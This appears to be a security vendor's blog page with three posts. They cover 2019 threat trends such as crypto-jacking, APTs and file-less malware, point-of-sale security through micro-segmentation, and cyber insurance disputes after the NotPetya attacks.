Posts

Understanding the Types of Cyber Threats on the Rise in 2019

Keeping your IT environment safe means ensuring your finger is on the pulse of the latest threats in cyber-security. However, while there are always the latest zero-day threats and new attack vectors, each year we see some fundamental repeats. Often attackers find it easy to penetrate networks that have poor hygiene such as old exploits left unpatched, authentication issues such as a lack of two factor authentication and weak passwords. These types of network threats threaten the security of your enterprise, endanger your public image, and put customer data and privacy at risk.

While some types of cyber threats have been around for many years, as we enter 2019, many are growing in complexity or changing in design. This risk is growing, especially as businesses continue to move their workloads and processes to multi and hybrid-cloud environments. Virtualization and hypervisors, container orchestration, and auto-scaling workloads are all realities of a modern enterprise. If we really think about what was new in 2018 and will surely continue in 2019, it is attackers attacking critical applications, data centers and clouds directly. In order to stay secure, as well as manage compliance and keep control despite potential gaps in vendor security, your own solution needs to step up. Businesses will increasingly need to choose a security solution that can effortlessly manage a hybrid and multi-cloud infrastructure.

Attackers are regularly learning new methods to gain entry or cause damage. Here are the top threats to look out for in 2019.

Direct Attacks on Data Centers and Clouds

What we’ve seen through our work with our customers and through our Guardicore Global Sensor Network is an increase in attacks on data centers and clouds directly. These types of cyber-security threats do not use targeted spear phishing campaigns to gain entry through a user within an enterprise. Instead, we see attackers finding known and zero day vulnerabilities in applications they can reach directly and exploiting these to get inside. In many cases their work is assisted by fundamental weaknesses like insecure passwords and a lack of dual factor authentication. One of Guardicore Labs’ most important finds this year was the Butter campaign. The attacker(s) started their attack by merely brute forcing poorly passworded SSH servers to gain access. Once they gained access – we found attackers moving incredibly easily across these applications and data centers due to poor segmentation.

While these attacks on the data centers are easy to accomplish, they remain difficult to spot. In fact, for some companies, security teams are not even the ones to ring the alarm bell. Dwell time is not reduced or mitigation started with an enterprise finding the attackers and blocking the threat, but with a third-party letting the enterprise know there is something wrong. In some cases this could be White Hat researchers or the customers themselves, and in the case of attackers seeking monetization – it could be credit card or law enforcement companies that notify the compromised enterprise.

Crypto-jacking

Many experts failed to predict the increase of cryptocurrency attacks for 2018, but no one is making that mistake this year. Attackers are often financially-driven, and mining for cryptocurrency is one way to attempt a quick payout, with more guaranteed results than ransomware. Besides merely offering DDoS as RAT as a service to their customers, the attackers are seeking an additional revenue stream. In fact, while crypto-jacking has risen 44.5% since 2017, ransomware has dropped by almost 30%. Mining malware often looks to exploit vulnerabilities such as unpatched software or known bugs such as this year’s Microsoft Windows Server 2003 vulnerability, or the Oracle Web Logic flaw.
The impact of these attacks is huge, and attackers can steal vast amounts of CPU usage from victims, slowing down performance overall and having a negative effect on both business and customers. Like a worm, virus, or other types of cyber-security threats, crypto-jacking attacks can be tough to find, leaving stakeholders using time-wasting trial and error to find the source of the slowdown. Visibility into the traffic on your network is essential, so that you can track CPU usage and compare real-time activity to historical baselines.

APT

An APT is an Advanced Persistent Threat, where an attacker can breach a network and stay undetected for a long period of time. The goal of these attacks is not to cause instant damage or immediately ask for ransom, drawing attention to your breach, but rather to insidiously steal information or security data in an unobtrusive way. An APT could breach your network using malware, exploit kits or by piggybacking on legitimate traffic. This could make it difficult to spot. Once your network is infected, an APT could find login credentials, and then use these to make lateral moves around your data center or wider system.

Origins of APTs are usually found to be state actors – either direct or sponsored government attackers. Probably the best example this year was the Marriott/SPG attack. With a dwell time that began in 2014 the state actor enjoyed great benefit from their access to Marriott’s SPG network. The data stolen included names, phone numbers, email addresses, passport numbers, dates of birth and arrival and departure information.

This personally identifiable data from an attack of this kind could offer an intelligence agency all sorts of very tangible benefits. One example could be the ability to create more legitimate looking false passports with the use of real identification documents.

This kind of breach would also provide actionable tracking information, allowing an agency or a bad actor to track people’s movements. They could see if someone was checking into particular locations or even catch a meeting between multiple people of interest. The data would also allow them to learn travel patterns and even potentially set up intelligence agencies to “intercept” people of interest.
Because APTs and similar types of cyber-security threats are designed to go unnoticed, they can be difficult to spot. Signs to look out for could be unusual network activity such as spikes in data access. Key defense tactics could be isolating critical data using micro-segmentation and using white lists to limit access to only the applications that should be allowed to communicate with one another.

File-less Malware

One dangerous type of attack that is typically found as part of an APT is file-less malware. As the name suggests, a file is never created, so standard antivirus file-based detection does not work against these breaches. While traditionally, file-less techniques were the first step in malware infection, in recent months fully file-less attacks are gaining traction.

These types of network threats often pivot from memory exploits to highly trusted system tools and then move to access of the rest of a network, undetected. The most common kinds of file-less malware attacks are remote logins, WMI-based attacks, and PowerShell or Microsoft Office based. In short – no malware doesn’t mean no breach. Micro-segmentation, especially if done with effective rules and in even more thorough projects down to the process level, can keep your most critical applications safe from lateral moves even within the same application cluster, even against the threats you can’t see coming.

Attacks on Critical IoT Devices

The final and perhaps the most frightening increase we have seen through 2018 is attackers commandeering critical IoT devices. Often unpatched, and residing in what are generally flat networks (ones without any segmentation), medical devices have been a big target in 2018 and are likely to be further exploited in 2019.

Furthermore, “point of sale” systems are another attack environment we’ve seen increase in popularity, as they also often suffer from a lack of patching and security, and are an easy target for both physical and remote attacks.

Recognizing how to Ward off These Types of Cyber-Security Threats

The combination of increasingly complex IT environments and the growing sophistication of cyber threats is a dangerous one. Micro-segmentation technology can reduce the attack surface in case of a breach, isolating attackers and keeping them away from critical assets and sensitive customer data. Building a smart segmentation strategy starts with a map of your entire IT environment, with application dependency mapping to visualize all the communications and flows in your ecosystem. This true visibility and real-time control over your entire infrastructure, from on premises data centers to multi and hybrid cloud IaaS is essential, in 2019 and beyond.

Want to learn more about breach detection to help prevent damage from cyber threats to your environment?

Read More

A Deep Dive into Point of Sale Security

Many businesses think of their Point of Sale (POS) systems as an extension of a cashier behind a sales desk. But with multiple risk factors to consider, such as network connectivity, open ports, internet access and communication with the most sensitive data a company handles, POS solutions are more accurately an extension of a company’s data center, a remote branch of their critical applications. This being considered, they should be seen as a high-threat environment, which means that they need a targeted security strategy.

Understanding a Unique Attack Surface

Distributed geographically, POS systems can be found in varied locations at multiple branches, making it difficult to keep track of each device individually and to monitor their connections as a group. They cover in-store terminals, as well as public kiosks and self-service stations in places like shopping malls, airports, and hospitals. Multiple factors, from a lack of resources to logistical difficulties, can make it near impossible to secure these devices at the source or react quickly enough in case of a vulnerability or a breach. Remote IT teams will often have a lack of visibility when it comes to being able to accurately see data and communication flows. This creates blind spots which prevent a full understanding of the open risks across a spread-out network. Threats are exacerbated further by the vulnerabilities of old operating systems used by many POS solutions.

Underestimating the extent of this risk could be a devastating oversight. POS solutions are connected to many of a business’s main assets, from customer databases to credit card information and internal payment systems, to name a few. The devices themselves are very exposed, as they are accessible to anyone, from a waiter in a restaurant to a passer-by in a department store. This makes them high-risk for physical attacks such as downloading a malicious application through USB, as well as remote attacks like exploiting the terminal through exposed interfaces, Recently, innate vulnerabilities have been found in mobile POS solutions from vendors that include PayPal, Square and iZettle, because of their use of Bluetooth and third-party mobile apps. According to the security researchers who uncovered the vulnerabilities, these “could allow unscrupulous merchants to raid the accounts of customers or attackers to steal credit card data.”

In order to allow system administrators remote access for support and maintenance, POS are often connected to the internet, leaving them exposed to remote attacks, too. In fact, 62% of attacks on POS environments are completed through remote access. For business decision makers, ensuring that staff are comfortable using the system needs to be a priority, which can make security a balancing act. A straightforward on-boarding process, a simple UI, and flexibility for non-technical staff are all important factors, yet can often open up new attack vectors while leaving security considerations behind.

One example of a remote attack is the POSeidon malware which includes a memory scraper and keylogger, so that credit card details and other credentials can be gathered on the infected machine and sent to the hackers. POSeidon gains access through third party remote support tools such as LogMeIn. From this easy access point, attackers then have room to move across a business network by escalating user privileges or making lateral moves.

High risk yet hard to secure, for many businesses POS are a serious security blind spot.

Safeguarding this Complex Environment and Getting Ahead of the Threat Landscape

Firstly, assume your POS environment is compromised. You need to ensure that your data is safe, and the attacker is unable to make movements across your network to access critical assets and core servers. At the top of your list should be preventing an attacker from gaining access to your payment systems, protecting customer cardholder information and sensitive data.

The first step is visibility. While some businesses will wait for operational slowdown or clear evidence of a breach before they look for any anomalies, a complex environment needs full contextual visibility of the ecosystem and all application communication within. Security teams will then be able to accurately identify suspicious activity and where it’s taking place, such as which executables are communicating with the internet where they shouldn’t be. A system that generates reports on high severity incidents can show you what needs to be analyzed further.

Now that you have detail on the communication among the critical applications, you can identify the expected behavior and create tight segmentation policy. Block rules,with application process context, can be used to contain any potential threat, ensuring that any future attackers in the data center would be completely isolated without disrupting business process or having any effect on performance.

The risk goes in both directions. Next, let’s imagine your POS is secure, but it’s your data center that is under attack. Your POS is an obvious target, with links to sensitive data and customer information. Micro-segmentation can protect this valuable environment, and stop an attack getting any further once it’s already in progress, without limiting the communication that your payment system needs to keep business running as usual.

With visibility and clarity, you can create and enforce the right policies, crafted around the strict boundaries that your POS application needs to communicate, and no further. Some examples of policy include:

    • Limiting outgoing internet connections to only the relevant servers and applications
    • Limiting incoming internet connections to only specific machines or labels
    • Building default block rules for ports that are not in use
    • Creating block rules that detail known malicious processes for network connectivity
    • Whitelisting rules to prevent unauthorized apps from running on the POS
    • Create strict allow rules to enable only the processes that should communicate, and block all other potential traffic

Tight policy means that your business can detect any attempt to connect to other services or communicate with an external application, reducing risk and potential damage. With a flexible policy engine, these policies will be automatically copied to any new terminal that is deployed within the network, allowing you to adapt and scale automatically, with no manual moves, changes, or adds slowing down business processes.

Don’t Risk Leaving this Essential Touchpoint Unsecured

Point of Sale solutions are a high-risk open door for attackers to access some of your most critical infrastructure and assets. Without adequate protection, a breach could grind your business to a halt and cost you dearly in both financial damage and brand reputation.

Intelligent micro-segmentation policy can isolate an attacker quickly to stop them doing any further damage, and set up strong rules that keep your network proactively safe against any potential risk. Combined with integrated breach detection capabilities, this technology allows for quick response and isolation of an attacker before the threat is able to spread and create more damage.

Want to learn more about how micro-segmentation can protect your endpoints while hardening the overall security for your data center?

Read More

Considering Cyber Insurance in the Aftermath of the NotPetya Attack

It’s been 18 months since June 2017 when the Petya/NotPetya cyber attacks fell on businesses around the globe, resulting in a dramatic loss of income and intense business disruption. Has cyber insurance limited the fallout for the victims of the ransomware attacks, and should proactive businesses follow suit and ensure they are financially covered in case of a breach?

Monetizing the Impact of Cybercrime

The effect on the IT and insurance industries of last years wave of cybercrime continues to grow as businesses disclose silent cyber impacts, as well as affirmative losses from WannaCry/Petya. The latest reports from Property Claim Services put the loss at over $3.3 billion, and growing.

Despite this, for some businesses, reliance on insurance schemes has proven inadequate. US Pharmaceutical company Merck disclosed that the Petya cyberattacks have cost them as much as $580 million since June 2017, and predicted an additional $200 million in costs by the end of 2018. In contrast, experts estimated their insurance pay-out would be around $275 million, a huge number, but under half of the amount they have incurred so far, let alone as their silent costs continue to rise.

Other companies have been left even worse off, such as snack food company Mondolez International Inc, who are in a continuing battle with their property insurer, Zurich American Insurance Company. Mondolez claimed for the Petya attacks under a policy that included “all risks of physical loss or damage” specifying “physical loss or damage to electronic data, programs, or software, including loss or damage caused by the malicious introduction of a machine code or instruction.”

However, Zurich disputed the claim, due to a clause that excludes insurance coverage for any “hostile or war-like act by any government or sovereign power.” As US Intelligence officials have determined that the NotPetya malware originated as an attack by the Russian military against the Ukraine, Zurich are fighting the claim by Mondelez that they are wrongfully denying coverage.

How Does This Lawsuit Affect the Cyber-Insurance Market Overall?

As cyber crime continues to rise, cyber insurance is understandably becoming big business. For companies deciding on whether to take out coverage, CISO’s need to find space in the budget for monthly costs and potentially large premiums. For this risk to be worthwhile, businesses want to be confident that they will recover their costs if a breach happens.

The insurance pay-outs around the Petya cyberattacks, and in particular the Mondolez case, throw this into question. This is especially true considering the rise in cyberattacks that are nation-backed or could plausibly be claimed to be nation-backed by insurance companies in order to dispute a claim. As regulations change and the US military are given more freedom to launch preventative cyberattacks against foreign government hackers, any evidence that suggests governmental or military attribution could be legitimately used against claimants looking to settle their losses.

The Effect on Public Research

The ripple effect of this could go beyond the claims sector, and have a connected impact on security research, as well as free press and journalism in the long run, something we feel strongly about at Guardicore Labs. Traditionally, researchers have had the freedom to comment and even speculate on the attribution of cyber attacks, through information on the attackers’ behavior behind the scenes and the attack signatures they use. If insurance companies and claims handlers begin using public research as a reason to deny coverage to the victims, this could put research teams in an ethical bind, reducing the amount of public research and the transparency of the industry overall.

How Much of a ‘Guarantee’ Can Security Companies Provide?

The issue of what claims to honor extends to financial guarantees from security companies, not only to insurance handlers. It is becoming increasingly popular to offer guarantees to customers who purchase cybersecurity products, in order to ‘put your money where your mouth is’ on the infallibility of a particular solution.

However, many experts believe that these policies have so many loopholes that they negate the benefit of the warranty overall. One example is the often cited ‘nation state or act of god’ exception, which includes cyberterrorism. Others include exclusions of coverage for portable devices, insider threats, or intentional acts. Even if you are widely covered for an event, does that extend to all employees? According to the latest Cyber Insurance Buying Guide, “most policies do not adequately provide for both first-party and third-party loss.”

Your ‘Guarantee’ is not a Guarantee

The bottom line for CISOs looking to protect their business is that cyber insurance is not a catch-all solution by any means. Whether it’s insurance companies paying out a limited figure or skirting a pay-out altogether, or cybersecurity companies making big promises that are ultimately undermined by the small print, cyber insurance has a way to go.

Focus on your cybersecurity solution, including strong technology like micro-segmentation to limit the attack surface in the case of a breach. With this in place, you can ensure that your critical assets and data are ring-fenced and isolated, no matter what your infrastructure looks like and what direction the attack comes from. Integration with powerful breach detection and incident response capabilities strengthens your position even further, reducing dwell time, and giving you a security posture you can rely on.